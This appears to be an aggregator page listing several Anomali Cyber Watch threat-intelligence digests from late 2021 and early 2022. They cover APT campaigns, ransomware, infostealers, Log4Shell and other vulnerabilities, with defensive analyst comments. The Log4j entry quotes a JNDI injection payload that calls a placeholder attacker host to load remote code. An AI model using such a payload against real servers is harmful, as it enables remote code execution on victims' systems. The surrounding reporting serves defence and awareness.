What's new arround internet
| Src | Date (GMT) | Titre | Description | Tags | Stories | Notes |
 |
2022-02-15 20:01:00 | Anomali Cyber Watch: Mobile Malware Is On The Rise, APT Groups Are Working Together, Ransomware For The Individual, and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: Mobile Malware, APTs, Ransomware, Infostealers, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
What’s With The Shared VBA Code Between Transparent Tribe And Other Threat Actors?
(published: February 9, 2022)
A recent discovery has been made that links malicious VBA macro code between multiple groups, namely: Transparent Tribe, Donot Team, SideCopy, Operation Hangover, and SideWinder. These groups operate (or operated) out of South Asia and use a variety of techniques with phishing emails and maldocs to target government and military entities within India and Pakistan. The code is similar enough that it suggests cooperation between APT groups, despite having completely different goals/targets.
Analyst Comment: This research shows that APT groups are sharing TTPs to assist each other, regardless of motive or target. Files that request content be enabled to properly view the document are often signs of a phishing attack. If such a file is sent to you via a known and trusted sender, that individual should be contacted to verify the authenticity of the attachment prior to opening. Thus, any such file attachment sent by unknown senders should be viewed with the utmost scrutiny, and the attachments should be avoided and properly reported to appropriate personnel.
MITRE ATT&CK: [MITRE ATT&CK] Command and Scripting Interpreter - T1059 | [MITRE ATT&CK] Phishing - T1566
Tags: Transparent Tribe, Donot, SideWinder, Asia, Military, Government
Fake Windows 11 Upgrade Installers Infect You With RedLine Malware
(published: February 9, 2022)
Due to the recent announcement of Windows 11 upgrade availability, an unknown threat actor has registered a domain to trick users into downloading an installer that contains RedLine malware. The site, "windows-upgraded[.]com", is a direct copy of a legitimate Microsoft upgrade portal. Clicking the 'Upgrade Now' button downloads a 734MB ZIP file which contains an excess of dead code; more than likely this is to increase the filesize for bypassing any antivirus scan. RedLine is a well-known infostealer, capable of taking screenshots, using C2 communications, keylogging and more.
Analyst Comment: Any official Windows update or installation files will be downloaded through the operating system directly. If offline updates are necessary, only go through Microsoft sites and subdomains. Never update Windows from a third-party site due to this type of attack.
MITRE ATT&CK: [MITRE ATT&CK] Video Capture - T1125 | [MITRE ATT&CK] Input Capture - T1056 | [MITRE ATT&CK] Exfiltration Over C2 Channel - T1041
Tags: RedLine, Windows 11, Infostealer
|
Ransomware Malware Tool Vulnerability Threat Guideline | Uber APT 43 APT 36 APT-C-17 | |
|
2022-02-01 18:55:00 | Anomali Cyber Watch: Researchers Break Down WhisperGate Wiper Malware, Trickbot Will Now Try To Crash Researcher PCs to Stop Reverse Engineering Attempts, New DeadBolt Ransomware Targets QNAP Devices (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: CVE-2022-21882, DazzleSpy , DeadBolt, DTPacker, Trickbot, and WhisperGate. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Windows Vulnerability With New Public Exploits Lets You Become Admin
(published: January 29, 2022)
A new vulnerability, tracked as CVE-2022-21882 was discovered by researcher RyeLv in early January 2022. The exploit is a bypass to a previous vulnerability, CVE-2021-1732, and affects all Windows 10 machines that have not applied January’s Patch Tuesday patch. This vulnerability is a privilege escalation exploit, which grants administrator level privileges and allows for the creation of new admin accounts, as well as lateral movement. The exploit abuses a flaw in the manner in which the kernel handles callbacks, changing the flag ConsoleWindow. This will modify the window type, and tricks the system into thinking tagWND.WndExtra is an offset of the kernel desktop heap, thereby granting administrator level read and write access.
Analyst Comment: Apply patches when they become available to keep your systems and assets protected from the latest attacks and vulnerabilities. This is essential when new vulnerabilities are discovered as threat actors will actively attempt to exploit them. A strong patch management policy combined with an effective asset management policy will assist you in keeping your assets up to date and protected.
MITRE ATT&CK: [MITRE ATT&CK] Create Account - T1136 | [MITRE ATT&CK] Exploitation for Privilege Escalation - T1068 | [MITRE ATT&CK] Process Discovery - T1057
Tags: Windows, Priviledge escalation, CVE-2021-1732, CVE-2022-21882
Shipment-Delivery Scams Become the Favored Way to Spread Malware
(published: January 28, 2022)
Researchers at Cofense and Checkpoint have documented a series of Phishing campaigns throughout Q4 of 2021. The campaign imitates large known delivery brands such as DHL or the US postal service, and aims to abuse the trust these companies have associated with them to manipulate their targets into clicking malicious links or files. The most prominent tactic is to provide a link to a missed package, capitalizing on current global supply chain issues. Once clicked, TrickBot malware is delivered, though other campaigns are delivering as of yet non-attributed trojans. The malicious links in these campaigns are not particularly sophisticated, and are easily identified as false as they lead to domains outside the company they are targeting.
Analyst Comment: Never click on attachments or links from untrustworthy sources, and verify with the legitimate sender the integrity of these emails. Treat any email that attempts to scare, coerce, provide a time limit or force you to click links or attachments with extreme suspicion.
MITRE ATT&CK: [MITRE ATT&CK] User Execution - T1204 | [MITRE ATT&CK] Phishing |
Ransomware Malware Vulnerability Threat Guideline | NotPetya | |
|
2022-01-25 16:00:00 | Anomali Cyber Watch: MoonBounce, AccessPress, QR Code Scams and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, Linux Malware, Supply-Chain Attacks, Malspam, Phishing, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
FBI Warns Of Malicious QR Codes Used To Steal Your Money
(published: January 23, 2022)
The Federal Bureau of Investigation (FBI) recently released a notice that malicious QR codes have been found in the wild. These codes, when scanned, will redirect the victim to a site where they are prompted to enter personal and payment details. The site will then harvest these credentials for cybercriminals to commit fraud and empty bank accounts. This threat vector has been seen in Germany as of December 2021.
Analyst Comment: Always be sure to check that emails have been sent from a legitimate source, and that any financial details or method of payment is done through the website. While QR codes are useful and being used by businesses more often, it is easy for cybercriminals to perform this kind of scam. If scanning a physical QR code, ensure the code has not been replaced with a sticker placed on top of the original code. Check the final URL to make sure it is the intended site and looks authentic.
MITRE ATT&CK: [MITRE ATT&CK] Phishing - T1566
Tags: EU & UK, Banking and Finance
MoonBounce: The Dark Side Of UEFI Firmware
(published: January 20, 2022)
Kaspersky has reported that in September 2021, a bootloader malware infection had been discovered that embeds itself into UEFI firmware. The malware patches existing UEFI drivers and resides in the SPI flash memory located on the motherboard. This means that it will persist even if the hard drive is replaced. Code snippets and IP addresses link the activity to APT41, a group that is operated by a group of Chinese-speaking individuals. MoonBounce is highly sophisticated and very difficult to detect.
Analyst Comment: Systems should be configured to take advantage of Trusted Platform Module (TPM) hardware security chips to secure their systems' boot image and firmware, where available. Secure boot is also a viable option to mitigate against attacks that would patch, reconfigure, or flash existing UEFI firmware to implant malicious code.
MITRE ATT&CK: [MITRE ATT&CK] Pre-OS Boot - T1542 | [MITRE ATT&CK] Data Obfuscation - T1001 | [MITRE ATT&CK] Data Encoding - T1132 | [MITRE ATT&CK] Exploitation of Remote Services - T1210 | [MITRE ATT&CK] Remote Services - T1021 | [MITRE ATT&CK] Shared Modules - T1129 | [MITRE ATT&CK] Hijack Execution Flow - T1574 | |
Ransomware Malware Tool Vulnerability Threat Guideline | APT 41 APT 28 | |
|
2022-01-19 22:45:00 | Anomali Cyber Watch: Russia-Sponsored Cyber Threats, China-Based Earth Lusca Active in Cyberespionage and Cybertheft, BlueNoroff Hunts Cryptocurrency-Related Businesses, and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, China, HTTP Stack, Malspam, North Korea, Phishing, Russia and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Earth Lusca Employs Sophisticated Infrastructure, Varied Tools and Techniques
(published: January 17, 2022)
The Earth Lusca threat group is part of the Winnti cluster. It is one of different Chinese groups that share aspects of their tactics, techniques, and procedures (TTPs) including the use of Winnti malware. Earth Lusca were active throughout 2021 committing both cyberespionage operations against government-connected organizations and financially-motivated intrusions targeting gambling and cryptocurrency-related sectors. For intrusion, the group tries different ways in including: spearphishing, watering hole attacks, and exploiting publicly facing servers. Cobalt Strike is one of the group’s preferred post-exploitation tools. It is followed by the use of the BioPass RAT, the Doraemon backdoor, the FunnySwitch backdoor, ShadowPad, and Winnti. The group employs two separate infrastructure clusters, first one is rented Vultr VPS servers used for command-and-control (C2), second one is compromised web servers used to scan for vulnerabilities, tunnel traffic, and Cobalt Strike C2.
Analyst Comment: Earth Lusca often relies on tried-and-true techniques that can be stopped by security best practices, such as avoiding clicking on suspicious email/website links and or reacting on random banners urging to update important public-facing applications. Don’t be tricked to download Adobe Flash update, it was discontinued at the end of December 2020. Administrators should keep their important public-facing applications (such as Microsoft Exchange and Oracle GlassFish Server) updated.
MITRE ATT&CK: [MITRE ATT&CK] Drive-by Compromise - T1189 | [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] Phishing - T1566 | [MITRE ATT&CK] Command and Scripting Interpreter - T1059 | [MITRE ATT&CK] Scheduled Task - T1053 | [MITRE ATT&CK] System Services - T1569 | [MITRE ATT&CK] Windows Management Instrumentation - T1047 | [MITRE ATT&CK] Account Manipulation - T1098 | [MITRE ATT&CK] BITS Jobs - T1197 | [MITRE ATT&CK] Create Account - T1136 | [MITRE ATT&CK] Create or Modify System Process - T1543 | [MITRE ATT&CK] External Remote Services - T1133 | [MITRE ATT&CK] Hijack Execution Flow |
Ransomware Malware Tool Vulnerability Threat Patching Guideline | APT 41 APT 38 APT 29 APT 28 APT 28 | |
|
2022-01-12 16:00:00 | Anomali Cyber Watch: FluBot, iOS, Ransomware, Zloader, and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, Data breach, Phishing, Ransomware and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Attack Misuses Google Docs Comments to Spew Out “Massive Wave” of Malicious Links
(published: January 7, 2022)
Security researchers have seen a very large number of attacks leveraging the comment features of Google Docs to send emails to users containing malicious content. The attackers can create a document, sheet, or slides and add comments tagging any user's email address. Google then sends an email to the tagged user account. These emails come from Google itself and are more likely to be trusted than some other phishing avenues.
Analyst Comment: Phishing education can often help users identify and prevent phishing attacks. Specific to this attack method, users should verify that any unsolicited comments that are received come from the user indicated, and if unsure, reach out separately to the user that appears to have sent the comment to verify that it is real. Links in email should be treated with caution.
MITRE ATT&CK:[MITRE ATT&CK] Masquerading - T1036 | [MITRE ATT&CK] Phishing - T1156
Tags: Google, Impersonation, Phishing
Finalsite Ransomware Attack Forces 5,000 School Websites Offline
(published: January 7, 2022)
Finalsite, a firm used by schools for website content management, design, and hosting, has been hit by an unknown strain of ransomware that affected approximately 5,000 of their 8,000 customers. The company has said in a statement that many of the affected sites were preemptively shut down to protect user's data, that there is no evidence of that data was breached (although they did not confirm that they had the needed telemetry in place to detect that), and that most of the sites and services have been restored.
Analyst Comment: Verified backup and disaster recovery processes are an important aspect of protecting organizations and allowing for remediation of successful attacks. Monitoring and telemetry can aid in detection and prevention from attacks, and provide evidence as to whether data has been exfiltrated.
MITRE ATT&CK:[MITRE ATT&CK] Web Service - T1102 | [MITRE ATT&CK] Data Encrypted for Impact - T1486
Tags: Education, Finalsite, Ransomware, Web hosting
FluBot’s Authors Employ Creative and Sophisticated Techniques to Achieve Their Goals in Version 5.0 and Beyond
(published: January 6, 2022)
Security researchers have analyzed a new and more sophisticated version of the FluBot Android malware first detected in early 2020. Once installed on a device, the malware can full |
Ransomware Data Breach Malware Tool Vulnerability Threat Guideline | ||
|
2022-01-05 19:55:00 | Anomali Cyber Watch: $5 Million Breach Extortion, APTs Using DGA Subdomains, Cyberespionage Group Incorporates A New Tool, and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, Cyberespionage, Data breach, DGA, Infostealer, Phishing, Rootkit, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Fintech Firm Hit by Log4j Hack Refuses to Pay $5 Million Ransom
(published: December 29, 2021)
The Vietnamese crypto trading, ONUS, was breached by unknown threat actor(s) by exploiting the Log4Shell (CVE-2021-44228) vulnerability between December 11 and 13. The exploited target was an AWS server running Cyclos, which is a point-of-sale software provider, and the server was only intended for sandbox purposes. Actors were then able to steal information via the misconfigured AWS S3 buckets containing information on approximately two million customers. Threat actors then attempted to extort five million dollars (USD).
Analyst Comment: Although Cyclos issued a warning to patch on December 13, the threat actors had already gained illicit access. Even though Log4Shell provided initial access to the compromised server, it was the misconfigured buckets the actors took advantage of to steal data.
MITRE ATT&CK: [MITRE ATT&CK] Exploitation for Client Execution - T1203
Tags: ONUS, Log4Shell, CVE-2021-44228,
Strategically Aged Domain Detection: Capture APT Attacks With DNS Traffic Trends
(published: December 29, 2021)
Palo Alto Networks Unit42 researchers have published a report based on their tracking of strategically-aged malicious domains (registered but not used until a specific time) and their domain generation algorithm (DGA) created subdomains. Researchers found two Pegasus spyware command and control domains that were registered in 2019 and were not active until July 2021. A phishing campaign using DGA subdomains that were similar to those used during the SolarWinds supply chain attack was also identified.
Analyst Comment: Monitor your networks for abnormal DNS requests, and have bandwidth limitations in place, if possible, to prevent numerous connections to DGA domains. Knowing which DGAs are most active in the wild will allow you to build a proactive defense by detecting any DGA that is in use. Anomali can detect DGA algorithms used by malware to assist in defending against these types of threats.
MITRE ATT&CK: [MITRE ATT&CK] Dynamic Resolution - T1568 | [MITRE ATT&CK] Phishing - T1566 | [MITRE ATT&CK] Application Layer Protocol - T1071
Tags: DGA , Pegasus, Phishing
Implant.ARM.iLOBleed.a
(published: December 28, 2021)
Amnpardaz researchers discovered a new rootkit that has been targeting Hewlett-Packard Enterprise’s Integrated Lights-Out (iLO) server managemen |
Malware Hack Tool Vulnerability Threat | LastPass | |
|
2021-12-29 16:00:00 | Anomali Cyber Watch: Equation Group\'s Post-Exploitation Framework, Decentralized Finance (DeFi) Protocol Exploited, Third Log4j Vulnerability, and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: Apache Log4j 2, APT, Malspam, Ngrok relay, Phishing, Sandbox evasion, Scam, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
A Deep Dive into DoubleFeature, Equation Group’s Post-Exploitation Dashboard
(published: December 27, 2021)
Check Point researchers have published their findings on the Equation Group’s post-exploitation framework DanderSpritz — a major part of the “Lost in Translation” leak — with a focus on its DoubleFeature logging tool. DoubleFeature (similar to other Equation Group tools) employs several techniques to make forensic analysis difficult: function names are not passed explicitly, but instead a checksum of it; strings used in DoubleFeature are decrypted on-demand per function and they are re-encrypted once function execution completes. DoubleFeature also supports additional obfuscation methods, such as a simple substitution cipher and a stream cipher. In its information gathering DoubleFeature can monitor multiple additional plugins including: KillSuit (also known as KiSu and GrayFish) plugin that is running other plugins, providing a framework for persistence and evasion, MistyVeal (MV) implant verifying that the targeted system is indeed an authentic victim, StraitBizarre (SBZ) cross-platform implant, and UnitedRake remote access tool (UR, EquationDrug).
Analyst Comment: It is important to study Equation Group’s frameworks because some of the leaked exploits were seen exploited by other threat actors. Defense-in-depth (layering of security mechanisms, redundancy, fail-safe defense processes) is the best way to ensure safety from APTs, including a focus on both network and host-based security. Prevention and detection capabilities should also be in place.
MITRE ATT&CK: [MITRE ATT&CK] Modify Registry - T1112 | [MITRE ATT&CK] Rootkit - T1014 | [MITRE ATT&CK] Virtualization/Sandbox Evasion - T1497 | [MITRE ATT&CK] Deobfuscate/Decode Files or Information - T1140
Tags: Equation Group, DanderSpritz, DoubleFeature, Shadow Brokers, EquationDrug, UnitedRake, DiveBar, KillSuit, GrayFish, StraitBizarre, MistyVeal, PeddleCheap, DiceDealer, FlewAvenue, DuneMessiah, CritterFrenzy, Elby loader, BroughtHotShot, USA, Russia, APT
Dridex Affiliate Dresses Up as Scrooge
(published: December 23, 2021)
Days before Christmas, an unidentified Dridex affiliate is using malspam emails with extremely emotion-provoking lures. One malicious email purports that 80% of the company’s employees have tested positive for Omicron, a variant of COVID-19, another email claims that the recipient was just terminated from his or her job. The attached malicious Microsoft Excel documents have two anti-sandbox features: they are password protected, and the macro doesn’t run until a user interacts with a pop-up dialog. If the user makes the macro run, it will drop an .rtf f |
Ransomware Malware Tool Vulnerability Threat Conference | APT 35 | |
|
2021-12-21 16:57:00 | Anomali Cyber Watch: \'PseudoManuscrypt\' Mass Spyware Campaign Targets 35K Systems, APT31 Intrusion Set Campaign: Description, Countermeasures and Code, State-sponsored hackers abuse Slack API to steal (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT31, Magecart, Hancitor, Pakdoor, Lazarus, and Vulnerabilities CVE-2021-21551.. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
NSW Government Casual Recruiter Suffers Ransomware Hit
(published: December 17, 2021)
Finite Recruitment suffered a ransomware attack during the month of October 2021, resulting in the exfiltration of some data. Their incident responders (IR) identified the ransomware as Conti, a fast encrypting ransomware commonly attributed to the cybercriminal group Wizard Spider. The exfiltrated data was published on the dark web, however the firm remains fully operational, and affected customers are being informed.
Analyst Comment: Always check to see if there is a decryptor available for the ransomware before considering payment. Enforce a strong backup policy to ensure that data is recoverable in the event of encryption or loss.
MITRE ATT&CK: [MITRE ATT&CK] Scheduled Transfer - T1029
Tags: Conti, Wizard Spider, Ransomware, Banking and Finance
Phorpiex botnet is back with a new Twizt: Hijacking Hundreds of crypto transactions
(published: December 16, 2021)
Check Point Research has uncovered a new variant of the Phorpiex botnet named Twizt. Historically, Phorpiex utilized sextortion, ransomware delivery, and cryptocurrency clipping. Twizt however, appears to be primarily focused on stealing cryptocurrency and have stolen half a million dollars since November 2020 in the form of Bitcoin, Ether and ERC20 tokens.The botnet features departure from it’s traditional command and control (C2) infrastructure, opting for peer-to-peer (P2P) communications between infected hosts, eliminating the need for C2 communication as each host can fulfill that role.
Analyst Comment: Bots within a P2P network need to communicate regularly with other bots to receive and share commands. If the infected bots are on a private network, private IP addresses will be used. Therefore, careful monitoring of network traffic will reveal suspicious activity, and a spike in network resource usage as opposed to the detection of C2 IP addresses.
MITRE ATT&CK: [MITRE ATT&CK] Data Encoding - T1132 | [MITRE ATT&CK] File and Directory Discovery - T1083 | [MITRE ATT&CK] Clipboard Data - T1115
Tags: Phorpiex, Twizt, Russia, Banking and Finance, Cryptocurrency, Bitcoin
‘PseudoManuscrypt’ Mass Spyware Campaign Targets 35K Systems
(published: December 16, 2021)
Kaspersky researchers have documented a spyware that has targeted 195 countries as of December 2021. The spyware, named PseudoManuscrypt, was developed and deployed by Lazarus Group |
Ransomware Malware Vulnerability Threat Guideline Medical | APT 41 APT 38 APT 28 APT 31 | |
|
2021-12-15 16:00:00 | Anomali Cyber Watch: Apache Log4j Zero-Day Exploit, Google Fighting Glupteba Botnet, Vixen Panda Targets Latin America and Europe, and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: Apache, Botnets, China, Espionage, Java, Russia, USB, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Countless Servers Are Vulnerable to Apache Log4j Zero-Day Exploit
(published: December 10, 2021)
A critical vulnerability, registered as CVE-2021-44228, has been identified in Apache Log4j 2, which is an open source Java package used to enable logging in. The Apache Software Foundation (ASF) rates the vulnerability as a 10 on the common vulnerability scoring system (CVSS) scale. Cisco Talos has observed malicious activity related to CVE-2021-44228 beginning on December 2, 2021. This vulnerability affects millions of users and exploitation proof-of-concept code exists via LunaSec explains how to exploit it in five simple steps. These include: 1: Data from the User gets sent to the server (via any protocol). 2: The server logs the data in the request, containing the malicious payload: ${jndi:ldap://attacker.com/a} (where attacker.com is an attacker controlled server). 3: The Log4j vulnerability is triggered by this payload and the server makes a request to attacker.com via "Java Naming and Directory Interface" (JNDI). 4: This response contains a path to a remote Java class file (ex. http://second-stage.attacker.com/Exploit.class) which is injected into the server process. 5: This injected payload triggers a second stage, and allows an attacker to execute arbitrary code.
Analyst Comment: Log4j version 2.15.0 has been released to address this vulnerability, however, it only changes a default setting (log4j2.formatMsgNoLookups) from false to true. This means that if the setting is set back to false, Log4j will again be vulnerable to exploitation. The initial campaigns could have been detected by filtering on certain keywords such as "ldap", "jndi", but this detection method is easily bypassable.
MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] Exploitation for Client Execution - T1203 | [MITRE ATT&CK] Command and Scripting Interpreter - T1059 | [MITRE ATT&CK] Remote Services - T1021 | [MITRE ATT&CK] OS Credential Dumping - T1003 | [MITRE ATT&CK] Resource Hijacking - T1496 | [MITRE ATT&CK] Network Denial of Service - T1498
Tags: Log4j, CVE-2021-44228, Log4j2, Log4Shell, Apache, Zero-day, Java, Jndi, Class file
Over a Dozen Malicious NPM Packages Caught Hijacking Discord Servers
(published: December 8, 2021)
Researchers from the DevOps firm JFrog has found at least 17 malicious packages on the open source npm Registry for JavaScript. The names of the packages are: prerequests-xcode (version 1.0.4), discord-selfbot-v14 (version 12.0.3), discord-lofy (version 11.5.1), discordsystem (version 11.5.1), discord-vilao (version 1.0.0), fix-error (version 1 |
Malware Tool Vulnerability Threat Cloud | APT 37 APT 29 APT 15 APT 15 APT 25 | |
|
2021-12-13 22:26:00 | Apache Log4j 2 Vulnerability Affects Numerous Companies, Millions of Users (lien direct) | A critical vulnerability, registered as CVE-2021-44228 (Log4Shell), has been identified in Apache Log4j 2, which is an open source Java package used to enable logging in.[1] The vulnerability was discovered by Chen Zhaojun of Alibaba in late November 2021, reported to Apache, and subsequently released to the public on December 10, 2021.[2]
The Apache Software Foundation (ASF) rates CVE-2021-44228 as a 10 on the common vulnerability scoring system (CVSS) scale.[3] Log4Shell is a remote code execution (RCE) vulnerability that is exploited via improper deserialization of user input that is sent into the Log4j package framework.[4] Specifically, the vulnerability is located in the JNDI component of the LDAP connector.[5] A threat actor’s objective is to trick JNDI into connecting to an threat actor-controlled directory.[6] However, the exploitation reliability of Log4Shell is dependent on how the package is implemented.
Affected versions: log4j version 2.0-beta9 to version 2.14.1.
Attack Complexity: Low.
Privileges Required: None.
User Interaction: Not required.
How Anomali Can Help
ThreatStream: The Anomali Threat Research team has released a ThreatStream dashboard “Log4Shell (CVE-2021-44228)” for tracking associated indicators, research articles, and vulnerable products. (shown in figure below.)
Integrator: Customers can use Anomali Integrator to block specific IOCs in their downstream security integrations.
Match: Match can provide alerting and retrospective lookup capabilities to detect and contextualize matches for these indicators.
For more information, reach out to your Customer Success Manager.
Endnotes
[1] “CVE-2021-44228 Detail,” NVD NIST, access December 13, 2021, published December 10, 2021https://nvd.nist.gov/vuln/detail/CVE-2021-44228; Free Wortley, et al., “Log4Shell: RCE 0-day exploit found in log4j 2, a popular Java logging package,” LunaSec, accessed December 13, 2021, published December 12, 2021, https://www.lunasec.io/docs/blog/log4j-zero-day/.
[2] Jake King and Samir Bousseaden, “Detecting Exploitation of CVE-2021-44228 (log4j2) with Elastic Security,” Elastic NV, accessed December 13, published December 10, 2021, https://www.elastic.co/blog/detecting-log4j2-with-elastic-security.
[3] “CVE-2021-44228 Detail,” NVD NIST.
[4] Jake King and Samir Bousseaden, “Detecting Exploitation of CVE-2021-44228 (log4j2) with Elastic Security,” Elastic NV.
[5] “Threat Advisory: Critical Apache Log4j vulnerability being exploited in the wild,” Cisco Talos Blog, accessed December 13, 2021, published December 10, 2021, https://blog.talosintelligence.com/2021/12/apache-log4j-rce-vulnerability.html.
[6] Hans-Martin Münch, “VULNERABILITY NOTES: LOG4SHELL,” Mogwai Labs, accessed December 13, 2021, published, December 10, 2021, https://mogwailabs.de/en/blog/2021/12/vulnerability-notes-log4shell/?s=09. |
Vulnerability Threat | ||
|
2021-12-07 16:04:00 | Anomali Cyber Watch: Nginx Trojans, BlackByte Ransomware, Android Malware Campaigns, and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, Ransomware, Maldocs, E-Commerce, Phishing, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
New Malware Hides as Legit Nginx Process on E-Commerce Servers
(published: December 2, 2021)
Researchers at Sansec discovered NginRAT, a new malware variant that has been found on servers in the US, Germany, and France. Put in place to intercept credit card payments, this malware impersonates legitimate nginx processes which makes it very difficult to detect. NginRAT has shown up on systems that were previously infected with CronRAT, a trojan that schedules processes to run on invalid calendar days. This is used as a persistence technique to ensure that even if a malicious process is killed, the malware has a way to re-infect the system.
Analyst Comment: Threat actors are always adapting to the security environment to remain effective. New techniques can still be spotted with behavioural analysis defenses and social engineering training. Ensure that your company's firewall blocks all entry points for unauthorized users, and maintain records of how normal traffic appears on your network. Therefore, it will be easier to spot unusual traffic and connections to and from your network to potentially identify malicious activity.
MITRE ATT&CK: [MITRE ATT&CK] Obfuscated Files or Information - T1027 | [MITRE ATT&CK] Shared Modules - T1129
Tags: NginRAT, CronRAT, Nginx, North America, EU
How Phishing Kits Are Enabling A New Legion Of Pro Phishers
(published: December 2, 2021)
Phishing kits, such as XBALTI are seeing increased use against financial institutions. Mixing email with SMS messages, attackers are targeting companies such as Charles Schwab, J.P. Morgan Chase, RBC Royal Bank and Wells Fargo. Victims are targeted and asked to verify account details. The attack is made to appear legitimate by redirecting to the real sites after information has been harvested.
Analyst Comment: With financial transactions increasing around this time of year, it is likely financially themed malspam and phishing emails will be a commonly used tactic. Therefore, it is crucial that your employees are aware of their financial institution's policies regarding electronic communication. If a user is concerned due to the scare tactics often used in such emails, they should contact their financial institution via legitimate email or another form of communication. Requests to open a document in a sense of urgency and poor grammar are often indicative of malspam or phishing attacks. Said emails should be properly avoided and reported to the appropriate personnel.
Tags: Phishing, XBATLI
Injection is the New Black: Novel RTF Template Inject Technique Poised for Widespread Adoption Beyond APT Actors
(pub |
Ransomware Malware Tool Vulnerability Threat Cloud | APT 37 | ★★★★ |
|
2021-11-30 17:09:00 | Anomali Cyber Watch: Web Skimmers Victimize Holiday Shoppers, Tardigrade Targets Vaccine Manufacturers, Babadeda Crypter Targets Crypto Community, and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: Data breach, Stealthy malware, Vulnerabilities and Web skimmers. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Micropatching Unpatched Local Privilege Escalation in Mobile Device Management Service (CVE-2021-24084 / 0day)
(published: November 26, 2021)
0patch Team released free, unofficial patches to protect Windows 10 users from a local privilege escalation (LPE) zero-day vulnerability in the Mobile Device Management Service. The security flaw resides under the "Access work or school" settings, and it bypasses a patch released by Microsoft in February to address an information disclosure vulnerability tracked as CVE-2021-24084. Security researcher Abdelhamid Naceri discovered this month that the incompletely-patched flaw could also be exploited to gain admin privileges after publicly disclosing the newly-spotted bug in June. He also published a proof of concept (POC) for a related vulnerability in Windows 11.
Analyst Comment: Check if your Windows 10 version is affected and if so, apply the appropriate free micropatches. Plan to patch your Windows 11 systems when security patches become available. As actors now have a POC for the Windows 11 privilege escalation vulnerability, it is important to harden your systems to avoid the initial access.
MITRE ATT&CK: [MITRE ATT&CK] Exploitation for Privilege Escalation - T1068
Tags: CVE-2021-24084, Vulnerability, Micropatching, Privilege escalation, LPE, Administrative access, Zero-day, Windows, Windows 10, Windows 11
CronRAT Malware Hides Behind February 31st
(published: November 24, 2021)
Sansec researchers have discovered CronRAT, a new remote access trojan (RAT), that is capable of stealing payment details by going after vulnerable web stores and dropping payment skimmers on Linux servers. By modifying the server-side code it bypasses browser-based security solutions. CronRAT actors engage in Magecart attacks achieving additional stealthiness thanks to the Linux Cron Job system. CronRAT code is compressed, Base64-encoded and hidden in the task names in the calendar subsystem of Linux servers (“cron”). To avoid system administrators’ attention and execution errors, those tasks are scheduled on a nonexistent day (such as February 31st). Other CronRAT stealthiness techniques are: anti-tampering checksums, being controlled via binary/obfuscated protocol, control server disguised as Dropbear SSH service, fileless execution, launching tandem RAT in a separate Linux subsystem, and timing modulation.
Analyst Comment: Websites, much like personal workstations, require constant maintenance and upkeep in order to adapt to the latest threats. All external facing assets should be monitored and scanned for vulnerabilities. Threats like CronRAT make it critical that server software is kept up to date. The ability to easily restore from backup, incident response planning, and customer communication channels should all be established before a breach occurs. In addition, supply chain attacks are becoming more frequent amongst threat actors as their Tactics, Techniques, and Procedures (TTPs) evolve. Therefore, it is par |
